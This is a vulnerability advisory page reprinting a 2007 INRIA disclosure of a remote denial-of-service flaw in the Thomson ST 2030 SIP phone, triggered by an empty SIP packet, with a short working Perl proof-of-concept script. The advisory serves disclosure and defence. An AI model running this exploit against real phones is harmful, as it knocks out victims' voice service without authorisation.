DOS vulnerability on Thomson SIP phone ST 2030 using an empty packet

2007.09.10
Credit: Radu State
Risk: Medium
Local: No
Remote: Yes


Ogólna skala CVSS: 5/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Brak
Wpływ na dostępność: Częściowy

MADYNES Security Advisory : Remote DOS on Thomson SIP phone ST 2030 using an empty packet Date of Discovery 15 February, 2007 Vendor was notified on 1 March 2007 ID: KIPH10 Synopsis After sending an empty message the device looks functional but in fact does not respond to any event provoking a DoS Background SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP signalization. SIP is an ASCII based INVITE message is used to initiate and maintain a communication session. Affected devices: Thomson SIP phone ST 2030 Impact : A malicious user can remotely crash and perform a denial of service attack by sending one crafted void SIP message. Resolution Fixed software will be available from the vendor and customers following recommended best practices (ie segregating VOIP traffic from data) will be protected from malicious traffic in most situations. Credits Humberto J. Abdelnur (Ph.D Student) Radu State (Ph.D) Olivier Festor (Ph.D) This vulnerability was identified by the Madynes research team at INRIA Lorraine, using the Madynes VoIP fuzzer KIPH (for a description see http://hal.inria.fr/inria-00166947/en), Configuration of our device: Software Version: v1.52.1 IP-Address obtained by DHCP as 192.168.1.106 User name : thomson To run the exploit the file thomson-2030-pl should be launched (assuming our configurations) as: POC Code: perl thomson-2030.pl 192.168.1.106 5060 thomson #!/usr/bin/perl use IO::Socket::INET; die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]); $socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], Proto=>'udp', PeerAddr=>$ARGV[0]); $msg = ""; $socket->send($msg);


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top